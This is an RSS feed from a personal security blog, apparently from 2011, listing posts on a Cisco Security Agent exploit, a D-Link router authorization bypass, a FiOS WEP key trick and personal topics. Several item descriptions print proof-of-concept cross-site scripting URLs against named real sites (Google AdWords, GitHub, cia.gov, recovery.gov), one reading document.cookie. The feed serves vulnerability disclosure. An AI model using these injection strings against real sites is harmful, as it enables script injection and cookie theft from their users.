<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>GerryEisenhaur.com</title>
	<atom:link href="http://www.gerryeisenhaur.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.gerryeisenhaur.com</link>
	<description>relevant ramblings of an ethical hacker</description>
	<lastBuildDate>Thu, 07 Apr 2011 05:31:24 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Cisco Security Agent Management Console &#8216;st_upload&#8217; Exploit.</title>
		<link>http://www.gerryeisenhaur.com/2011/04/07/cisco-security-agent-management-console-st_upload-exploit/</link>
		<comments>http://www.gerryeisenhaur.com/2011/04/07/cisco-security-agent-management-console-st_upload-exploit/#comments</comments>
		<pubDate>Thu, 07 Apr 2011 05:31:24 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[webappsec]]></category>

		<guid isPermaLink="false">http://www.gerryeisenhaur.com/?p=184</guid>
		<description><![CDATA[Here is my proof-of-concept exploit for the Cisco Security Agent Management st_upload Remote Code Execution Vulnerability (ZDI-11-088) I reported to ZDI a little while back. CVE ID: CVE-2011-0364]]></description>
		<wfw:commentRss>http://www.gerryeisenhaur.com/2011/04/07/cisco-security-agent-management-console-st_upload-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Getting schooled in rummy.</title>
		<link>http://www.gerryeisenhaur.com/2011/03/07/getting-schooled-in-rummy/</link>
		<comments>http://www.gerryeisenhaur.com/2011/03/07/getting-schooled-in-rummy/#comments</comments>
		<pubDate>Mon, 07 Mar 2011 05:58:25 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>

		<guid isPermaLink="false">http://www.gerryeisenhaur.com/?p=174</guid>
		<description><![CDATA[My wife and I are playing a &#8220;never ending&#8221; game of rummy and being the geek I am, I decided to keep track of our game play so we can chart our progress. Needless to say my wife is kicking my ass and now its public for all to see. Luckily, I have time for [...]]]></description>
		<wfw:commentRss>http://www.gerryeisenhaur.com/2011/03/07/getting-schooled-in-rummy/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Random XSS</title>
		<link>http://www.gerryeisenhaur.com/2011/01/04/random-xss/</link>
		<comments>http://www.gerryeisenhaur.com/2011/01/04/random-xss/#comments</comments>
		<pubDate>Wed, 05 Jan 2011 02:12:18 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.hiredhacker.com/?p=165</guid>
		<description><![CDATA[I have a bad habit of saving these little random bugs and telling myself that I &#8216;may have a need for them later&#8217;. I think thats just the paranoid security guy in me, but then again I do the same for random little electronic parts I find. Given the fact I just cleaned out all [...]]]></description>
		<wfw:commentRss>http://www.gerryeisenhaur.com/2011/01/04/random-xss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Using Python and PEFile to Extract Embedded Code</title>
		<link>http://www.gerryeisenhaur.com/2011/01/04/using-python-and-pefile-to-extract-embedded-code/</link>
		<comments>http://www.gerryeisenhaur.com/2011/01/04/using-python-and-pefile-to-extract-embedded-code/#comments</comments>
		<pubDate>Wed, 05 Jan 2011 01:44:37 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[pefile]]></category>
		<category><![CDATA[python]]></category>

		<guid isPermaLink="false">http://www.hiredhacker.com/?p=157</guid>
		<description><![CDATA[I&#8217;ve been cleaning old code again and I think it&#8217;s been long enough that I can release this now. I used it to extract code that was embedded within the Cisco Security Agent Management Console (CSAMC). Hopefully someone will find it useful.]]></description>
		<wfw:commentRss>http://www.gerryeisenhaur.com/2011/01/04/using-python-and-pefile-to-extract-embedded-code/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Google Adsense XSS</title>
		<link>http://www.gerryeisenhaur.com/2011/01/04/google-adsense-xss/</link>
		<comments>http://www.gerryeisenhaur.com/2011/01/04/google-adsense-xss/#comments</comments>
		<pubDate>Wed, 05 Jan 2011 01:26:47 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.hiredhacker.com/?p=152</guid>
		<description><![CDATA[Not sure when this got reported or fixed, but I guess I missed the reward by a day. https://adwords.google.com/cm/CampaignMgmt?__u=1111111111&#038;__c=1111111111&#038;stylePrefOverride=2',0);alert(document.cookie)//]]></description>
		<wfw:commentRss>http://www.gerryeisenhaur.com/2011/01/04/google-adsense-xss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Old FiOS WEP Key Trick</title>
		<link>http://www.gerryeisenhaur.com/2010/05/04/old-fios-wep-key-trick/</link>
		<comments>http://www.gerryeisenhaur.com/2010/05/04/old-fios-wep-key-trick/#comments</comments>
		<pubDate>Wed, 05 May 2010 01:21:04 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[exploit]]></category>

		<guid isPermaLink="false">http://www.hiredhacker.com/?p=140</guid>
		<description><![CDATA[Started cleaning out some old code and found this. It was a quick little trick to decrypt (some) FiOS WEP keys, not sure if it still works.]]></description>
		<wfw:commentRss>http://www.gerryeisenhaur.com/2010/05/04/old-fios-wep-key-trick/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>D-Link DIR-615 Remote Exploit</title>
		<link>http://www.gerryeisenhaur.com/2009/12/15/d-link-dir-615-remote-exploit/</link>
		<comments>http://www.gerryeisenhaur.com/2009/12/15/d-link-dir-615-remote-exploit/#comments</comments>
		<pubDate>Tue, 15 Dec 2009 18:55:16 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>

		<guid isPermaLink="false">http://www.hiredhacker.com/?p=108</guid>
		<description><![CDATA[D-Link&#8217;s DIR-615 Wireless N Router (http://www.dlink.com/products/?pid=565) contains a flaw that allows attackers to access administrative functions without authorization. By simply requesting a certain URL, this vulnerability can be used to perform numerous attacks including changing the admin password, disabling wireless security, and changing DNS settings. The hole is confirmed in firmware version 3.10NA. Example (changes [...]]]></description>
		<wfw:commentRss>http://www.gerryeisenhaur.com/2009/12/15/d-link-dir-615-remote-exploit/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>GitHub XSS</title>
		<link>http://www.gerryeisenhaur.com/2009/12/15/github-xss/</link>
		<comments>http://www.gerryeisenhaur.com/2009/12/15/github-xss/#comments</comments>
		<pubDate>Tue, 15 Dec 2009 18:29:58 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.hiredhacker.com/?p=104</guid>
		<description><![CDATA[http://github.com/search?q=python&#38;type=Everything&#38;repo='&#34;&#62;&#60;script&#62;alert(/pwned/)&#60;/script&#62;]]></description>
		<wfw:commentRss>http://www.gerryeisenhaur.com/2009/12/15/github-xss/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CIA.gov and Recovery.gov XSS</title>
		<link>http://www.gerryeisenhaur.com/2009/12/15/cia-gov-and-recovery-gov-xss/</link>
		<comments>http://www.gerryeisenhaur.com/2009/12/15/cia-gov-and-recovery-gov-xss/#comments</comments>
		<pubDate>Tue, 15 Dec 2009 18:24:37 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.hiredhacker.com/?p=99</guid>
		<description><![CDATA[https://www.cia.gov/search?q="%20style%3d"position:absolute;top:-100px;left:-100px;width:10000px;height:10000px;z-index:999;"%20onmouseover%3d"alert(/pwn3d/) http://www.recovery.gov/_layouts/1033/Recovery500.aspx?errorurl=&#60;script&#62;alert('and pwned again')&#60;/script&#62;&#38;error=&#60;script&#62;alert('pwned')&#60;/script&#62;]]></description>
		<wfw:commentRss>http://www.gerryeisenhaur.com/2009/12/15/cia-gov-and-recovery-gov-xss/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Google Wave Invites</title>
		<link>http://www.gerryeisenhaur.com/2009/12/12/google-wave-invites/</link>
		<comments>http://www.gerryeisenhaur.com/2009/12/12/google-wave-invites/#comments</comments>
		<pubDate>Sat, 12 Dec 2009 13:57:53 +0000</pubDate>
		<dc:creator>Gerry Eisenhaur</dc:creator>
				<category><![CDATA[Content]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[wave]]></category>

		<guid isPermaLink="false">http://www.hiredhacker.com/?p=95</guid>
		<description><![CDATA[More Google Wave invites, who wants em?]]></description>
		<wfw:commentRss>http://www.gerryeisenhaur.com/2009/12/12/google-wave-invites/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
	</channel>
</rss>

